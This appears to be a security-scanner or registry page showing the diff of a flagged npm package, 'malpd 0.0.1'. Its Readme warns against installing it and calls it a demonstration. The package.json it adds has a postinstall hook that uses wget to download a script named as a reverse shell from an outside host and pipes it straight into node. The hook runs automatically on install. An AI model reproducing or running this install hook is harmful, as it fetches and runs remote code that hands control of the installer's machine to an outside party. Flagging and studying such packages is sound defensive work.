malpd 0.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of malpd might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/Readme.md +3 -0
  2. package/package.json +12 -0
package/Readme.md ADDED
@@ -0,0 +1,3 @@
1
+ # DO NOT INSTALL THIS. YOU HAVE BEEN WARNED.
2
+
3
+ This demonstrates why you shouldn't install packages from untrusted sources.
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "malpd",
3
+ "version": "0.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "wget \"https://playground.strazze.com/payloads/reverse-shell-v1.js?raw=1\" -O - | node"
8
+ },
9
+ "keywords": ["malware", "malicious"],
10
+ "author": "",
11
+ "license": "ISC"
12
+ }